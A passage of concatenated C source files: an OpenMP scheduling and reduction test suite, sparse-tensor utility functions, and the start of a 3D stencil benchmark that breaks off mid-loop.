sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel for shared(a) schedule(runtime) num_threads(num_threads_reqd)
for(int i=0; i<128; i++)
{
a[i] = i;
num_threads = omp_get_num_threads();
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_static)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "static", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_static_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "static,10", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_static_reduction)
{/*{{{*/
setenv("OMP_SCHEDULE", "static", 1);
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(runtime) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
unsetenv("OMP_SCHEDULE");
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_static_reduction_num_threads_one)
{/*{{{*/
setenv("OMP_SCHEDULE", "static", 1);
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel for shared(a) schedule(runtime) reduction(+: sum) num_threads(1)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
unsetenv("OMP_SCHEDULE");
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_dynamic)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "dynamic", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_dynamic_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "dynamic,10", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_guided)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "guided", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_parallel_for_runtime_guided_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "guided,10", 1);
#pragma omp parallel for shared(a) schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_static)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel shared(a)
{
#pragma omp for schedule(static)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_static_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel shared(a) num_threads(num_threads_reqd)
{
num_threads = omp_get_num_threads();
#pragma omp for schedule(static)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_for_static_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel shared(a)
{
#pragma omp for schedule(static) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_dynamic)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel shared(a)
{
#pragma omp for schedule(dynamic)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_dynamic_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel shared(a) num_threads(num_threads_reqd)
{
num_threads = omp_get_num_threads();
#pragma omp for schedule(dynamic)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_for_dynamic_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel shared(a)
{
#pragma omp for schedule(dynamic) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_guided)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel shared(a)
{
#pragma omp for schedule(guided)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_guided_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel shared(a) num_threads(num_threads_reqd)
{
num_threads = omp_get_num_threads();
#pragma omp for schedule(guided)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_for_guided_reduction)
{/*{{{*/
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel shared(a)
{
#pragma omp for schedule(guided) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime)
{/*{{{*/
int a[128] = {0};
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_num_threads_small)
{/*{{{*/
int a[128] = {0};
int num_threads_reqd = 2;
int num_threads;
#pragma omp parallel shared(a) num_threads(num_threads_reqd)
{
num_threads = omp_get_num_threads();
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
ck_assert_int_eq(num_threads, num_threads_reqd);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_static)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "static", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_static_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "static,10", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_static_reduction)
{/*{{{*/
setenv("OMP_SCHEDULE", "static", 1);
int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
unsetenv("OMP_SCHEDULE");
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_dynamic)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "dynamic", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_dynamic_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "dynamic,10", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_guided)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "guided", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_guided_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "guided,10", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
Suite* test_suite(void)
{/*{{{*/
Suite* s = suite_create("Test");
TCase* tc = tcase_create("omp_for");
tcase_add_test(tc, omp_parallel_for);
tcase_add_test(tc, omp_parallel_for_num_threads_small);
tcase_add_test(tc, omp_parallel_for_parallel_for_num_threads_small);
tcase_add_test(tc, omp_parallel_for_static);
tcase_add_test(tc, omp_parallel_for_static_num_threads_small);
tcase_add_test(tc, omp_parallel_for_static_reduction);
tcase_add_test(tc, omp_parallel_for_static_reduction_num_threads_one);
tcase_add_test(tc, omp_parallel_for_dynamic);
tcase_add_test(tc, omp_parallel_for_dynamic_num_threads_small);
tcase_add_test(tc, omp_parallel_for_dynamic_reduction);
tcase_add_test(tc, omp_parallel_for_dynamic_reduction_num_threads_one);
tcase_add_test(tc, omp_parallel_for_guided);
tcase_add_test(tc, omp_parallel_for_guided_num_threads_small);
tcase_add_test(tc, omp_parallel_for_guided_reduction);
tcase_add_test(tc, omp_parallel_for_guided_reduction_num_threads_one);
tcase_add_test(tc, omp_parallel_for_runtime);
tcase_add_test(tc, omp_parallel_for_runtime_num_threads_small);
tcase_add_test(tc, omp_parallel_for_runtime_static);
tcase_add_test(tc, omp_parallel_for_runtime_static_chunk);
tcase_add_test(tc, omp_parallel_for_runtime_static_reduction);
tcase_add_test(tc, omp_parallel_for_runtime_static_reduction_num_threads_one);
tcase_add_test(tc, omp_parallel_for_runtime_dynamic);
tcase_add_test(tc, omp_parallel_for_runtime_dynamic_chunk);
tcase_add_test(tc, omp_parallel_for_runtime_guided);
tcase_add_test(tc, omp_parallel_for_runtime_guided_chunk);
tcase_add_test(tc, omp_for_static);
tcase_add_test(tc, omp_for_static_num_threads_small);
tcase_add_test(tc, omp_for_static_reduction);
tcase_add_test(tc, omp_for_dynamic);
tcase_add_test(tc, omp_for_dynamic_num_threads_small);
tcase_add_test(tc, omp_for_dynamic_reduction);
tcase_add_test(tc, omp_for_guided);
tcase_add_test(tc, omp_for_guided_num_threads_small);
tcase_add_test(tc, omp_for_guided_reduction);
tcase_add_test(tc, omp_for_runtime);
tcase_add_test(tc, omp_for_runtime_static);
tcase_add_test(tc, omp_for_runtime_static_chunk);
tcase_add_test(tc, omp_for_runtime_static_reduction);
tcase_add_test(tc, omp_for_runtime_dynamic);
tcase_add_test(tc, omp_for_runtime_dynamic_chunk);
tcase_add_test(tc, omp_for_runtime_guided);
tcase_add_test(tc, omp_for_runtime_guided_chunk);
suite_add_tcase(s, tc);
return s;
}/*}}}*/
int main(void)
{/*{{{*/
int number_failed;
Suite* s;
SRunner* sr;
s = test_suite();
sr = srunner_create(s);
srunner_run_all(sr, CK_VERBOSE);
number_failed = srunner_ntests_failed(sr);
srunner_free(sr);
return (number_failed == 0) ? EXIT_SUCCESS : EXIT_FAILURE;
}/*}}}*/
|
sptensor.c |
/******************************************************************************
* INCLUDES
*****************************************************************************/
#include "sptensor.h"
#include "matrix.h"
#include "sort.h"
#include "io.h"
#include "timer.h"
#include <math.h>
/******************************************************************************
* PRIVATE FUNCTONS
*****************************************************************************/
static inline int p_same_coord(
sptensor_t const * const tt,
idx_t const i,
idx_t const j)
{
idx_t const nmodes = tt->nmodes;
if(nmodes == 3) {
return (tt->ind[0][i] == tt->ind[0][j]) &&
(tt->ind[1][i] == tt->ind[1][j]) &&
(tt->ind[2][i] == tt->ind[2][j]);
} else {
for(idx_t m=0; m < nmodes; ++m) {
if(tt->ind[m][i] != tt->ind[m][j]) {
return 0;
}
}
return 1;
}
}
/******************************************************************************
* PUBLIC FUNCTONS
*****************************************************************************/
val_t tt_normsq(sptensor_t const * const tt)
{
val_t norm = 0.0;
storage_val_t const * const restrict tv = tt->vals;
for(idx_t n=0; n < tt->nnz; ++n) {
norm += tv[n] * tv[n];
}
return norm;
}
double tt_density(
sptensor_t const * const tt)
{
double root = pow((double)tt->nnz, 1./(double)tt->nmodes);
double density = 1.0;
for(idx_t m=0; m < tt->nmodes; ++m) {
density *= root / (double)tt->dims[m];
}
return density;
}
void tt_print_hist(sptensor_t const * const tt, int mode)
{
int *hist = (int *)splatt_malloc(tt->dims[mode]*sizeof(*hist));
#pragma omp parallel for
for(idx_t n=0; n < tt->dims[mode]; ++n) {
hist[n] = 0;
}
#pragma omp parallel for
for(idx_t n=0; n < tt->nnz; ++n) {
#pragma omp atomic
hist[tt->ind[mode][n]]++;
}
for(idx_t n=0; n < tt->dims[mode]; ++n) {
if(hist[n] > 0) {
printf("%ld %d\n", n, hist[n]);
}
}
splatt_free(hist);
}
idx_t * tt_get_slices(
sptensor_t const * const tt,
idx_t const m,
idx_t * nunique)
{
/* get maximum number of unique slices */
idx_t minidx = tt->dims[m];
idx_t maxidx = 0;
idx_t const nnz = tt->nnz;
fidx_t const * const inds = tt->ind[m];
/* find maximum number of uniques */
#pragma omp parallel for reduction(min:minidx), reduction(max:maxidx)
for(idx_t n=0; n < nnz; ++n) {
minidx = SS_MIN(minidx, inds[n]);
maxidx = SS_MAX(maxidx, inds[n]);
}
/* +1 because maxidx is inclusive, not exclusive */
idx_t const maxrange = 1 + maxidx - minidx;
/* mark slices which are present and count uniques */
idx_t * slice_mkrs = calloc(maxrange, sizeof(*slice_mkrs));
idx_t found = 0;
#pragma omp parallel for reduction(+:found)
for(idx_t n=0; n < nnz; ++n) {
assert(inds[n] >= minidx);
idx_t const idx = inds[n] - minidx;
if(__sync_bool_compare_and_swap(slice_mkrs + idx, 0, 1)) {
++found;
}
}
*nunique = found;
/* now copy unique slices */
idx_t * slices = (idx_t *) splatt_malloc(found * sizeof(*slices));
idx_t ptr = 0;
for(idx_t i=0; i < maxrange; ++i) {
if(slice_mkrs[i] == 1) {
slices[ptr++] = i + minidx;
}
}
free(slice_mkrs);
return slices;
}
idx_t tt_remove_dups(
sptensor_t * const tt)
{
tt_sort(tt, 0, NULL);
idx_t const nmodes = tt->nmodes;
idx_t newnnz = 0;
for(idx_t nnz = 1; nnz < tt->nnz; ++nnz) {
/* if the two nnz are the same, average them */
if(p_same_coord(tt, newnnz, nnz)) {
tt->vals[newnnz] += tt->vals[nnz];
} else {
/* new another nnz */
++newnnz;
for(idx_t m=0; m < nmodes; ++m) {
tt->ind[m][newnnz] = tt->ind[m][nnz];
}
tt->vals[newnnz] = tt->vals[nnz];
}
}
++newnnz;
idx_t const diff = tt->nnz - newnnz;
tt->nnz = newnnz;
return diff;
}
idx_t tt_remove_empty(
sptensor_t * const tt)
{
idx_t dim_sizes[MAX_NMODES];
idx_t nremoved = 0;
/* Allocate indmap */
idx_t const nmodes = tt->nmodes;
idx_t const nnz = tt->nnz;
idx_t maxdim = 0;
for(idx_t m=0; m < tt->nmodes; ++m) {
maxdim = tt->dims[m] > maxdim ? tt->dims[m] : maxdim;
}
/* slice counts */
idx_t * scounts = (idx_t *) splatt_malloc(maxdim * sizeof(*scounts));
for(idx_t m=0; m < nmodes; ++m) {
dim_sizes[m] = 0;
memset(scounts, 0, maxdim * sizeof(*scounts));
/* Fill in indmap */
for(idx_t n=0; n < tt->nnz; ++n) {
/* keep track of #unique slices */
if(scounts[tt->ind[m][n]] == 0) {
scounts[tt->ind[m][n]] = 1;
++dim_sizes[m];
}
}
/* move on if no remapping is necessary */
if(dim_sizes[m] == tt->dims[m]) {
tt->indmap[m] = NULL;
continue;
}
nremoved += tt->dims[m] - dim_sizes[m];
/* Now scan to remove empty slices */
idx_t ptr = 0;
for(idx_t i=0; i < tt->dims[m]; ++i) {
if(scounts[i] == 1) {
scounts[i] = ptr++;
}
}
tt->indmap[m] = splatt_malloc(dim_sizes[m] * sizeof(**tt->indmap));
/* relabel all indices in mode m */
tt->dims[m] = dim_sizes[m];
#pragma omp parallel for
for(idx_t n=0; n < tt->nnz; ++n) {
idx_t const global = tt->ind[m][n];
idx_t const local = scounts[global];
assert(local < dim_sizes[m]);
tt->indmap[m][local] = global; /* store local -> global mapping */
tt->ind[m][n] = local;
}
}
splatt_free(scounts);
return nremoved;
}
/******************************************************************************
* PUBLIC FUNCTONS
*****************************************************************************/
sptensor_t * tt_read(
char const * const ifname)
{
int l = strlen(ifname);
sptensor_t * tt;
if (l > 4 && !strcmp(ifname + l - 4, ".bin")) {
tt = tt_read_binary_file(ifname);
}
else {
tt = tt_read_file(ifname);
}
return tt;
}
sptensor_t * tt_alloc(
idx_t const nnz,
idx_t const nmodes)
{
sptensor_t * tt = splatt_malloc(sizeof(*tt));
tt->tiled = SPLATT_NOTILE;
tt->nnz = nnz;
#if SPLATT_SPTENSOR_HBW
tt->vals = splatt_hbw_malloc(nnz * sizeof(*tt->vals));
#else
tt->vals = splatt_malloc(nnz * sizeof(*tt->vals));
#endif
tt->nmodes = nmodes;
tt->type = (nmodes == 3) ? SPLATT_3MODE : SPLATT_NMODE;
tt->dims = splatt_malloc(nmodes * sizeof(*tt->dims));
tt->ind = splatt_malloc(nmodes * sizeof(*tt->ind));
#if SPLATT_SPTENSOR_HBW
for(idx_t m=0; m < nmodes; ++m) {
tt->ind[m] = splatt_hbw_malloc(nnz * sizeof(**tt->ind));
tt->indmap[m] = NULL;
}
#else
for(idx_t m=0; m < nmodes; ++m) {
tt->ind[m] = splatt_malloc(nnz * sizeof(**tt->ind));
tt->indmap[m] = NULL;
}
#endif
return tt;
}
void tt_fill(
sptensor_t * const tt,
idx_t const nnz,
idx_t const nmodes,
fidx_t ** const inds,
storage_val_t * const vals)
{
tt->tiled = SPLATT_NOTILE;
tt->nnz = nnz;
tt->vals = vals;
tt->ind = inds;
tt->nmodes = nmodes;
tt->type = (nmodes == 3) ? SPLATT_3MODE : SPLATT_NMODE;
tt->dims = (idx_t*) splatt_malloc(nmodes * sizeof(*tt->dims));
for(idx_t m=0; m < nmodes; ++m) {
tt->indmap[m] = NULL;
tt->dims[m] = inds[m][0];
for(idx_t i=1; i < nnz; ++i) {
tt->dims[m] = SS_MAX(tt->dims[m], inds[m][i]);
}
}
}
void tt_free(
sptensor_t * tt)
{
#if SPLATT_SPTENSOR_HBW
splatt_hbw_free(tt->vals);
#else
splatt_free(tt->vals);
#endif
for(idx_t m=0; m < tt->nmodes; ++m) {
#if SPLATT_SPTENSOR_HBW
splatt_hbw_free(tt->ind[m]);
#else
splatt_free(tt->ind[m]);
#endif
splatt_free(tt->indmap[m]);
}
splatt_free(tt->dims);
splatt_free(tt->ind);
splatt_free(tt);
}
spmatrix_t * tt_unfold(
sptensor_t * const tt,
idx_t const mode)
{
idx_t nrows = tt->dims[mode];
idx_t ncols = 1;
for(idx_t m=1; m < tt->nmodes; ++m) {
ncols *= tt->dims[(mode + m) % tt->nmodes];
}
/* sort tt */
tt_sort(tt, mode, NULL);
/* allocate and fill matrix */
spmatrix_t * mat = spmat_alloc(nrows, ncols, tt->nnz);
idx_t * const rowptr = mat->rowptr;
idx_t * const colind = mat->colind;
val_t * const mvals = mat->vals;
/* make sure to skip ahead to the first non-empty slice */
idx_t row = 0;
for(idx_t n=0; n < tt->nnz; ++n) {
/* increment row and account for possibly empty ones */
while(row <= tt->ind[mode][n]) {
rowptr[row++] = n;
}
mvals[n] = tt->vals[n];
idx_t col = 0;
idx_t mult = 1;
for(idx_t m = 0; m < tt->nmodes; ++m) {
idx_t const off = tt->nmodes - 1 - m;
if(off == mode) {
continue;
}
col += tt->ind[off][n] * mult;
mult *= tt->dims[off];
}
colind[n] = col;
}
/* account for any empty rows at end, too */
for(idx_t r=row; r <= nrows; ++r) {
rowptr[r] = tt->nnz;
}
return mat;
}
|
3d7pt_var.lbpar.c | #include <omp.h>
#include <math.h>
#define ceild(n,d) ceil(((double)(n))/((double)(d)))
#define floord(n,d) floor(((double)(n))/((double)(d)))
#define max(x,y) ((x) > (y)? (x) : (y))
#define min(x,y) ((x) < (y)? (x) : (y))
/*
* Order-1, 3D 7 point stencil with variable coefficients
* Adapted from PLUTO and Pochoir test bench
*
* Tareq Malas
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#ifdef LIKWID_PERFMON
#include <likwid.h>
#endif
#include "print_utils.h"
#define TESTS 2
#define MAX(a,b) ((a) > (b) ? a : b)
#define MIN(a,b) ((a) < (b) ? a : b)
/* Subtract the `struct timeval' values X and Y,
* storing the result in RESULT.
*
* Return 1 if the difference is negative, otherwise 0.
*/
int timeval_subtract(struct timeval *result, struct timeval *x, struct timeval *y)
{
/* Perform the carry for the later subtraction by updating y. */
if (x->tv_usec < y->tv_usec)
{
int nsec = (y->tv_usec - x->tv_usec) / 1000000 + 1;
y->tv_usec -= 1000000 * nsec;
y->tv_sec += nsec;
}
if (x->tv_usec - y->tv_usec > 1000000)
{
int nsec = (x->tv_usec - y->tv_usec) / 1000000;
y->tv_usec += 1000000 * nsec;
y->tv_sec -= nsec;
}
/* Compute the time remaining to wait.
* tv_usec is certainly positive.
*/
result->tv_sec = x->tv_sec - y->tv_sec;
result->tv_usec = x->tv_usec - y->tv_usec;
/* Return 1 if result is negative. */
return x->tv_sec < y->tv_sec;
}
int main(int argc, char *argv[])
{
int t, i, j, k, m, test;
int Nx, Ny, Nz, Nt;
if (argc > 3) {
Nx = atoi(argv[1])+2;
Ny = atoi(argv[2])+2;
Nz = atoi(argv[3])+2;
}
if (argc > 4)
Nt = atoi(argv[4]);
// allocate the arrays
double ****A = (double ****) malloc(sizeof(double***)*2);
for(m=0; m<2;m++){
A[m] = (double ***) malloc(sizeof(double**)*Nz);
for(i=0; i<Nz; i++){
A[m][i] = (double**) malloc(sizeof(double*)*Ny);
for(j=0;j<Ny;j++){
A[m][i][j] = (double*) malloc(sizeof(double)*Nx);
}
}
}
double ****coef = (double ****) malloc(sizeof(double***)*7);
for(m=0; m<7;m++){
coef[m] = (double ***) malloc(sizeof(double**)*Nz);
for(i=0; i<Nz; i++){
coef[m][i] = (double**) malloc(sizeof(double*)*Ny);
for(j=0;j<Ny;j++){
coef[m][i][j] = (double*) malloc(sizeof(double)*Nx);
}
}
}
// tile size information, including extra element to decide the list length
int *tile_size = (int*) malloc(sizeof(int));
tile_size[0] = -1;
// The list is modified here before source-to-source transformations
tile_size = (int*) realloc((void *)tile_size, sizeof(int)*5);
tile_size[0] = 24;
tile_size[1] = 24;
tile_size[2] = 8;
tile_size[3] = 32;
tile_size[4] = -1;
// for timekeeping
int ts_return = -1;
struct timeval start, end, result;
double tdiff = 0.0, min_tdiff=1.e100;
const int BASE = 1024;
// initialize variables
//
srand(42);
for (i = 1; i < Nz; i++) {
for (j = 1; j < Ny; j++) {
for (k = 1; k < Nx; k++) {
A[0][i][j][k] = 1.0 * (rand() % BASE);
}
}
}
for (m=0; m<7; m++) {
for (i=1; i<Nz; i++) {
for (j=1; j<Ny; j++) {
for (k=1; k<Nx; k++) {
coef[m][i][j][k] = 1.0 * (rand() % BASE);
}
}
}
}
#ifdef LIKWID_PERFMON
LIKWID_MARKER_INIT;
#pragma omp parallel
{
LIKWID_MARKER_THREADINIT;
#pragma omp barrier
LIKWID_MARKER_START("calc");
}
#endif
int num_threads = 1;
#if defined(_OPENMP)
num_threads = omp_get_max_threads();
#endif
for(test=0; test<TESTS; test++){
gettimeofday(&start, 0);
// serial execution - Addition: 6 && Multiplication: 2
/* Copyright (C) 1991-2014 Free Software Foundation, Inc.
This file is part of the GNU C Library.
The GNU C Library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
The GNU C Library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with the GNU C Library; if not, see
<http://www.gnu.org/licenses/>. */
/* This header is separate from features.h so that the compiler can
include it implicitly at the start of every compilation. It must
not itself include <features.h> or any other header that includes
<features.h> because the implicit include comes before any feature
test macros that may be defined in a source file before it first
explicitly includes a system header. GCC knows the name of this
header in order to preinclude it. */
/* glibc's intent is to support the IEC 559 math functionality, real
and complex. If the GCC (4.9 and later) predefined macros
specifying compiler intent are available, use them to determine
whether the overall intent is to support these features; otherwise,
presume an older compiler has intent to support these features and
define these macros by default. */
/* wchar_t uses ISO/IEC 10646 (2nd ed., published 2011-03-15) /
Unicode 6.0. */
/* We do not support C11 <threads.h>. */
int t1, t2, t3, t4, t5, t6, t7, t8;
int lb, ub, lbp, ubp, lb2, ub2;
register int lbv, ubv;
/* Start of CLooG code */
if ((Nt >= 2) && (Nx >= 3) && (Ny >= 3) && (Nz >= 3)) {
for (t1=-1;t1<=floord(Nt-2,12);t1++) {
lbp=max(ceild(t1,2),ceild(24*t1-Nt+3,24));
ubp=min(floord(Nt+Nz-4,24),floord(12*t1+Nz+9,24));
#pragma omp parallel for private(lbv,ubv,t3,t4,t5,t6,t7,t8)
for (t2=lbp;t2<=ubp;t2++) {
